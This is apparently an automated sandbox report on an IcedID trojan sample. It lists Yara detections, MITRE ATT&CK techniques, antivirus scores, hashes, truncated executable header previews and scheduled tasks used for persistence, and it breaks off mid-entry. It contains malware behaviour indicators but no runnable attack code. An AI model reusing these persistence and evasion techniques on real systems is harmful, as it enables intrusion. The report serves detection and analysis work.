Source: Yara match	File source: 16.2.zipdk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.ziczv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.czipqtsh.exe.20b6142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rencz.exe.716142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.uvtsuvts.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.ziczv.exe.716142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.zipdk.exe.20b6142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rencz.exe.716142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.uvtsuvts.exe.5c6142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GziaFibS0d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.tfykdkdkdk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.1477441952.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2450165604.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1478560194.000000000073A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1725192605.000000000058A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2700767215.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1951491009.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2218733852.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1250459151.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2950973983.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1251555372.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1953599695.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1024729856.000000000067D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1022438413.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1953599695.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2702209444.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1725192605.000000000056D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2702209444.000000000071A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2949720196.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2217134294.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1478560194.000000000071D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1251555372.000000000077D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2451887534.000000000077A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1024729856.000000000069B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2451887534.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1723691324.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2218733852.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2950973983.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected IcedID

Source: Yara match	File source: 6.2.tsuvgo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.uvtsuvts.exe.5c6142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.ziczv.exe.716142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.ayxuiczvtsui.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.tsuvgo.exe.636142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.tfykdkdkdk.exe.546142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.GziaFibS0d.exe.616142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.czipqtsh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.ayxuiczvtsui.exe.616142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.zipdk.exe.20b6142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.GziaFibS0d.exe.616142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.tfykdkdkdk.exe.546142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.tsuvgo.exe.636142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rencz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.ayxuiczvtsui.exe.616142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.czipqtsh.exe.20b6142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.zipdk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.ziczv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.czipqtsh.exe.20b6142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rencz.exe.716142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.uvtsuvts.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.ziczv.exe.716142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.zipdk.exe.20b6142.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rencz.exe.716142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.uvtsuvts.exe.5c6142.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GziaFibS0d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.tfykdkdkdk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.1477441952.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2450165604.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1478560194.000000000073A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1725192605.000000000058A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2700767215.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1951491009.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2218733852.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1250459151.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2950973983.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1251555372.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1953599695.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1024729856.000000000067D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1022438413.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1953599695.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2702209444.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1725192605.000000000056D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2702209444.000000000071A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2949720196.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2217134294.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1478560194.000000000071D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1251555372.000000000077D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2451887534.000000000077A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1024729856.000000000069B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2451887534.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1723691324.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2218733852.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2950973983.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	1 Scheduled Task/Job	1 Valid Accounts	1 Valid Accounts	1 Valid Accounts	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	4 Native API	1 Scheduled Task/Job	11 Access Token Manipulation	21 Virtualization/Sandbox Evasion	LSASS Memory	32 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	1 DLL Side-Loading	31 Process Injection	11 Access Token Manipulation	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Scheduled Task/Job	31 Process Injection	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 DLL Side-Loading	2 Obfuscated Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	22 Software Packing	Cached Domain Credentials	213 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
GziaFibS0d.exe	79%	ReversingLabs	Win32.Trojan.Generic
GziaFibS0d.exe	81%	Virustotal		Browse
GziaFibS0d.exe	100%	Avira	HEUR/AGEN.1312689
GziaFibS0d.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	100%	Avira	HEUR/AGEN.1312689
C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	100%	Avira	TR/AD.IcedId.htnhd
C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	100%	Avira	TR/AD.IcedId.htnhd
C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	100%	Avira	HEUR/AGEN.1312689
C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	100%	Avira	HEUR/AGEN.1312689
C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	100%	Avira	TR/AD.IcedId.htnhd
C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	100%	Avira	HEUR/AGEN.1312689
C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	100%	Avira	HEUR/AGEN.1312689
C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	100%	Joe Sandbox ML
C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	100%	Joe Sandbox ML
C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	100%	Joe Sandbox ML
C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	100%	Joe Sandbox ML
C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	100%	Joe Sandbox ML
C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	100%	Joe Sandbox ML
C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	100%	Joe Sandbox ML
C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1316288
Start date and time:	2023-09-29 11:08:14 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10, Office Professional Plus 2016, Chrome 115, Firefox 115, Adobe Reader 23, Java 8 Update 381
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	GziaFibS0d.exe
Original Sample Name:	dcddc1610068a8485efe1dfaee14100e.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@27/8@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 269 Number of non-executed functions: 369
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, geover.prod.do.dsp.mp.microsoft.com, x1.c.lencr.org, geo.prod.do.dsp.mp.microsoft.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
11:09:18	Task Scheduler	Run new task: {CF50FC27-5227-48E8-8D5B-04184E79734B} path: "C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe"
11:09:40	Task Scheduler	Run new task: {D667E012-4812-41E3-AD69-7257A6B22A6A} path: "C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe"
11:10:03	Task Scheduler	Run new task: {DDA53357-EA57-46B4-9B6B-478BCEEC1504} path: "C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe"
11:10:28	Task Scheduler	Run new task: {644E1D26-D226-4128-BBF6-D62843215C53} path: "C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe"
11:10:51	Task Scheduler	Run new task: {6B82A608-4308-4360-90B1-1EB6535B009A} path: "C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe"
11:11:17	Task Scheduler	Run new task: {73B440EF-B6EF-4A1A-8825-38658B9C8D71} path: "C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe"
11:11:40	Task Scheduler	Run new task: {7AA5154C-E54C-4F31-A632-45AA73D41414} path: "C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe"
11:12:07	Task Scheduler	Run new task: {812C35D4-29D4-4753-8D87-B7B3B4084D18} path: "C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe"

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498176
Entropy (8bit):	5.669953033586611
Encrypted:	false
SSDEEP:	3072:5gIEnSsfJUNnx3xEbU2X6uNZou+tjj0YqvHlDUwRq5snio2fWKIulMdtb6n36WkB:WSsfJUneLTn9K43WOJ
MD5:	2A114987A9C3FE717FD6DF2A44C89F1F
SHA1:	39A3705BAC5B8A2D53C9A7BC6868538F152A5456
SHA-256:	FB71492D57EBA4E89299695E3C0F5FD69FDCC9F9455DF00C6B82D00F8F04DBF7
SHA-512:	C732BB07C6D6ED1323F5A4CD723BB939D1B07E0E39590B9DA1DBCF5F9903A6D0A6F0D8DAA65638212A8A97B20D3B6A4768A9BF2A012FD305BD79039594AC9ED6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i)...G...G...G..Z...G..Z...G..Z...G..p...G...F...G..p...G..p...G..p...G.Rich..G.................PE..L...=..J.................P...................`....@..........................................................................z..P....P...............................a..............................0v..@............`...............................text....O.......P.................. ..`.rdata...#...`...$...T..............@..@.data...........\|...x..............@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498176
Entropy (8bit):	5.669998960109235
Encrypted:	false
SSDEEP:	3072:YgIEnSsfJUNnx3xEbU2X6uNZ3u+tjj0YqvHlDUwRq5snio2fWKIulMdtb6n36WkB:VSsfJUnewTn9K43WOJ
MD5:	38B4A6BB5079BAF60A6BC01BFB016449
SHA1:	49BC15D2A66B7C596D23E61B6D43E24608833D06
SHA-256:	2095C9DD24E62E393AF1B2C3613EBD3A39496B7A8DFE78C3D90BAC348CBA0A6A
SHA-512:	F24F55A0CF0AD6B19012C4396F5D6B8027C477650E4ACBB894BD03FE71BEFF9C5F25EB66B85AE584DA6229831413F50E172F0B28FF2A8526C80DAE7679292D2F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i)...G...G...G..Z...G..Z...G..Z...G..p...G...F...G..p...G..p...G..p...G.Rich..G.................PE..L...=..J.................P...................`....@..........................................................................z..P....P...............................a..............................0v..@............`...............................text....O.......P.................. ..`.rdata...#...`...$...T..............@..@.data...........\|...x..............@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498176
Entropy (8bit):	5.670001374852155
Encrypted:	false
SSDEEP:	3072:hgIEnSsfJUNnx3xEbU2X6uNZpu+tjj0YqvHlDUwRq5snio2fWKIulMdtb6n36WkB:uSsfJUneOTn9K43WOJ
MD5:	78B74716214690CD7677CD2596C4E1A6
SHA1:	FA87993A402748237C26F310527730E083DC7994
SHA-256:	649496A573F16A9F2E1142C2303570E3E1DD76F7B10F73BB7B5FF621D173718D
SHA-512:	BECAA0D6C1ED6B1EAB9A091C8AA9B2BF8B0DF64777DF1D22E5BAD8D248EC6FA56AA1853B06567113E9891AFA30E9A59ED6D133E6EAB7DB991B899E2D32458E4B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i)...G...G...G..Z...G..Z...G..Z...G..p...G...F...G..p...G..p...G..p...G.Rich..G.................PE..L...=..J.................P...................`....@..................................a.......................................z..P....P...............................a..............................0v..@............`...............................text....O.......P.................. ..`.rdata...#...`...$...T..............@..@.data...........\|...x..............@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498176
Entropy (8bit):	5.670001374852155
Encrypted:	false
SSDEEP:	3072:hgIEnSsfJUNnx3xEbU2X6uNZpu+tjj0YqvHlDUwRq5snio2fWKIulMdtb6n36WkB:uSsfJUneOTn9K43WOJ
MD5:	78B74716214690CD7677CD2596C4E1A6
SHA1:	FA87993A402748237C26F310527730E083DC7994
SHA-256:	649496A573F16A9F2E1142C2303570E3E1DD76F7B10F73BB7B5FF621D173718D
SHA-512:	BECAA0D6C1ED6B1EAB9A091C8AA9B2BF8B0DF64777DF1D22E5BAD8D248EC6FA56AA1853B06567113E9891AFA30E9A59ED6D133E6EAB7DB991B899E2D32458E4B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i)...G...G...G..Z...G..Z...G..Z...G..p...G...F...G..p...G..p...G..p...G.Rich..G.................PE..L...=..J.................P...................`....@..................................a.......................................z..P....P...............................a..............................0v..@............`...............................text....O.......P.................. ..`.rdata...#...`...$...T..............@..@.data...........\|...x..............@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498176
Entropy (8bit):	5.670001374852155
Encrypted:	false
SSDEEP:	3072:hgIEnSsfJUNnx3xEbU2X6uNZpu+tjj0YqvHlDUwRq5snio2fWKIulMdtb6n36WkB:uSsfJUneOTn9K43WOJ
MD5:	78B74716214690CD7677CD2596C4E1A6
SHA1:	FA87993A402748237C26F310527730E083DC7994
